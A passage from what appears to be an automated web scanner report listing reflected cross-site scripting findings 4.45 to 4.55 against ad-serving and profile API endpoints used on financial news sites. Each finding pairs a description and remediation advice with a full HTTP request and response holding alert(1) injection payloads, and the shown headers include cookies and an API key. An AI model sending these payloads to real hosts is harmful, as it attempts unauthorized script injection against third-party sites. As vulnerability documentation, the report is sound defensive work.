Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/marketwatch.com/markets_futuremovers;p39=47048'-alert(1)-'ca7e230a304 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 441
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:28:53 GMT
Expires: Sat, 14 May 2011 10:28:53 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;225017382;0-0;0;13112524;255-0/0;36796821/36814699/1;;~okv=;p39=47048'-alert(1)-'ca7e230a304;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.45. http://ad.doubleclick.net/adj/marketwatch.com/mutualfunds_jaffe [p39 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/marketwatch.com/mutualfunds_jaffe

Issue detail

The value of the p39 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7b36'-alert(1)-'24206ab45ed was submitted in the p39 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/marketwatch.com/mutualfunds_jaffe;p39=d7b36'-alert(1)-'24206ab45ed HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 441
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:31:41 GMT
Expires: Sat, 14 May 2011 10:31:41 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;225017382;0-0;0;13314513;255-0/0;36796821/36814699/1;;~okv=;p39=d7b36'-alert(1)-'24206ab45ed;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.46. http://ad.doubleclick.net/adj/marketwatch.com/personalfinance_story [p39 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /adj/marketwatch.com/personalfinance_story

Issue detail

The value of the p39 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fda9'%3b268fe484bfd was submitted in the p39 parameter. This input was echoed as 4fda9';268fe484bfd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/marketwatch.com/personalfinance_story;p39=4fda9'%3b268fe484bfd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 431
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:33:56 GMT
Expires: Sat, 14 May 2011 10:33:56 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/c;225017382;0-0;0;13112615;255-0/0;36796821/36814699/1;;~okv=;p39=4fda9';268fe484bfd;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

4.47. http://ad.doubleclick.net/adj/smartmoney.com/intromessage [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/smartmoney.com/intromessage

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c732'-alert(1)-'7486eaba3ca was submitted in the !category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/smartmoney.com/intromessage;!category=8c732'-alert(1)-'7486eaba3ca HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/static_html_files/smartmoney/smIntro.html?page=http://www.smartmoney.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 435
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:15:37 GMT
Expires: Sat, 14 May 2011 10:15:37 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/g;225696705;0-0;0;63658510;255-0/0;37134400/37152278/1;;~okv=;!category=8c732'-alert(1)-'7486eaba3ca;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/OrdersGateway?cds_mag_code=SMY&cds_page_id=66975&cds_response_key=IDFGODAB">
...[SNIP]...

4.48. http://api.bizographics.com/v1/profile.json [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload af121<script>alert(1)</script>e1480b57813 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoDataaf121<script>alert(1)</script>e1480b57813&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Sat, 14 May 2011 10:09:39 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=ba7ddfef-d5fe-4ab1-884d-c9a4dc879d96;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZLPZflIrFqisaj5XcunNcMDa7Re6IGD4lJipjjGNqtjAeAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRNLp9SGVM52IisJ2j66T44ZEVUJBxdqAyByxo0BnkxYHGMekeOMTo9anMP2vW0cZuIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 219
Connection: keep-alive

dj.module.ad.bio.loadBizoDataaf121<script>alert(1)</script>e1480b57813({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

4.49. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 79904<script>alert(1)</script>02362a720da was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun79904<script>alert(1)</script>02362a720da HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 14 May 2011 10:09:42 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun79904<script>alert(1)</script>02362a720da)

4.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ifl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ifl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52260"%3balert(1)//f14c2507aa2 was submitted in the ifl parameter. This input was echoed as 52260";alert(1)//f14c2507aa2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2284375&PluID=0&w=336&h=280&ord=3268510&ifrm=1&ifl=$$/static_html_files/addineyeV2.html$$52260"%3balert(1)//f14c2507aa2&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/n%3B239950972%3B0-0%3B0%3B46249204%3B4252-336/280%3B41839080/41856867/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bpage%3Drightrail%3Bmsrc%3DBOL_other_tnav_analysis%3Bbiz%3D1053%3B%3Bs%3D8_10001%3Bmc%3D0%3Btile%3D9%3Bsz%3D300x250%2C336x280%2C300x600%2C336x850%3B%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$&z=39 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/barrons.com/daily_barronstake;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;ord=2826282628262826;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPi0cOm00001idcDaMPm0cEt00001iuIZaMPl0aMI00001idcEaMPm0cEt00001jxYPaMPg0doZ00001iETRaMPm06b+00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD8SlE0000000001uD9fOJ0000000001uC8VS90000000001uD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iGbIaMPF0cFA00001idcDaMPm0cEt00001iuIZaMPl0aMI00001iETRaMPm06b+00001jxYPaMPg0doZ00001idcEaMPm0cEt00001; expires=Fri, 12-Aug-2011 06:33:43 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD8SlE0000000001uD8VS90000000001uD9fOJ0000000001uC8JJn0000000001uD; expires=Fri, 12-Aug-2011 06:33:43 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:33:42 GMT
Connection: close
Content-Length: 1938

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
2928/Type-11/4891372_9c2005ba-abc0-47ac-a2a5-aa7bd1fb066d.js";ebO.fvp="Res/";ebO.dlm=1;ebO.bt=5;ebO.bv=11.000000;ebO.plt=9;ebO.ut=gEbUT;ebO.ifrm=1;ebO.oo=0;ebO.ifl="/static_html_files/addineyeV2.html$$52260";alert(1)//f14c2507aa2&ncu=";ebO.z=39;ebO.fru="http://bs.serving-sys.com/BurstingPipe/BannerRedirect.bs?cn=brd&FlightID=2284375&Page=&PluID=0&EyeblasterID=4891372&Pos=4067714151756&ord=[timestamp]";ebO.pv="_4_5_0";ebBv="_2_
...[SNIP]...

4.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ncu request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d6139'><script>alert(1)</script>85c49d58796 was submitted in the ncu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BurstingPipe/adServer.bs?cn=sb&c=17&pli=2319721&PluID=0&w=300&h=250&ord=3142682&ifrm=1&p=&npu=$$$$&ncu=d6139'><script>alert(1)</script>85c49d58796 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPl0aMI00001jxYPaMPg0doZ00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iuIZaMPl0aMI00001idcEaMPA0cEt00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:28:47 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:28:47 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:28:46 GMT
Connection: close
Content-Length: 2379

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
<a href='d6139'><script>alert(1)</script>85c49d58796http%3a//bs.serving%2dsys.com/BurstingPipe/BannerRedirect.bs?cn=brd%26FlightID=2319721%26Page=%26PluID=0%26EyeblasterID=4772648%26Pos=4067795209908%26ord=%5btimestamp%5d' target='_blank'>
...[SNIP]...

4.52. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ncu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cbdc</script><script>alert(1)</script>050f40894a4 was submitted in the ncu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=sb&c=17&pli=2319721&PluID=0&w=300&h=250&ord=3142682&ifrm=1&p=&npu=$$$$&ncu=4cbdc</script><script>alert(1)</script>050f40894a4 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPl0aMI00001jxYPaMPg0doZ00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iuIZaMPl0aMI00001idcEaMPA0cEt00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:28:47 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:28:47 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:28:46 GMT
Connection: close
Content-Length: 2396

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
-1";ebO.dg="-1";ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-sys.com");ebO.p=escape("");ebO.ju=escape(ebTokens("http://www.spdr-etfs.com/dividends/"));ebO.ncu=escape("4cbdc</script><script>alert(1)</script>050f40894a4");ebO.iu=escape("Site-32294/Type-0/de700f0e-3d61-4dad-b19e-d31e16498ac6.gif");ebO.fu=escape("Site-32294/Type-2/6bca92d7-18a2-4321-a55b-7a6fac5e805b.swf");ebO.fv=10;var ebFN="StdBanner";if(0==1)ebFN+="
...[SNIP]...

4.53. http://bs.serving-sys.com/BurstingPipe/adServer.bs [npu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the npu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0bb"><script>alert(1)</script>7368fdb59ee was submitted in the npu parameter. This input was echoed as bf0bb\"><script>alert(1)</script>7368fdb59ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BurstingPipe/adServer.bs?cn=sb&c=17&pli=2319721&PluID=0&w=300&h=250&ord=3142682&ifrm=1&p=&npu=$$$$bf0bb"><script>alert(1)</script>7368fdb59ee&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/v%3B240157455%3B0-0%3B0%3B13112524%3B4307-300/250%3B41771240/41789027/1%3Bu%3D%5E%5E%3B%7Eokv%3D%3Bp39%3D223%3Bp39%3D234%3Bp39%3D220%3Bp39%3D233%3Bu%3D%5E%5E%3Bbiz%3D1053%3Bsz%3D300x250%2C336x280%2C300x600%2C336x850%3Btile%3D6%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPl0aMI00001jxYPaMPg0doZ00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iuIZaMPl0aMI00001idcEaMPA0cEt00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:28:46 GMT
Connection: close
Content-Length: 2571

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
<IMG SRC="$$bf0bb\"><script>alert(1)</script>7368fdb59ee&ncu=" width=0 height=0 style='position:absolute;left:0px;top:0px;'>
...[SNIP]...

4.54. http://bs.serving-sys.com/BurstingPipe/adServer.bs [npu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the npu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 163bd</script><script>alert(1)</script>6281c404d32 was submitted in the npu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=sb&c=17&pli=2319721&PluID=0&w=300&h=250&ord=3142682&ifrm=1&p=&npu=$$$$163bd</script><script>alert(1)</script>6281c404d32&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/v%3B240157455%3B0-0%3B0%3B13112524%3B4307-300/250%3B41771240/41789027/1%3Bu%3D%5E%5E%3B%7Eokv%3D%3Bp39%3D223%3Bp39%3D234%3Bp39%3D220%3Bp39%3D233%3Bu%3D%5E%5E%3Bbiz%3D1053%3Bsz%3D300x250%2C336x280%2C300x600%2C336x850%3Btile%3D6%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPl0aMI00001jxYPaMPg0doZ00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iuIZaMPl0aMI00001idcEaMPA0cEt00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:28:46 GMT
Connection: close
Content-Length: 2583

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
ace(/\[ebRandom\]/ig,ebRand).replace(/\[timestamp\]/ig,ebRand).replace(/\[%tp_adid%\]/ig,4772648).replace(/\[%tp_flightid%\]/ig,2319721).replace(/\[%tp_campaignid%\]/ig,143901);}var strNPU=ebTokens("$$163bd</script><script>alert(1)</script>6281c404d32&ncu=");document.write("<IMG SRC="+strNPU+" width=0 height=0 style='position:absolute;left:0px;top:0px;'>
...[SNIP]...

4.55. http://bs.serving-sys.com/BurstingPipe/adServer.bs [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c682f"%3balert(1)//e44e08c8f5b was submitted in the p parameter. This input was echoed as c682f";alert(1)//e44e08c8f5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

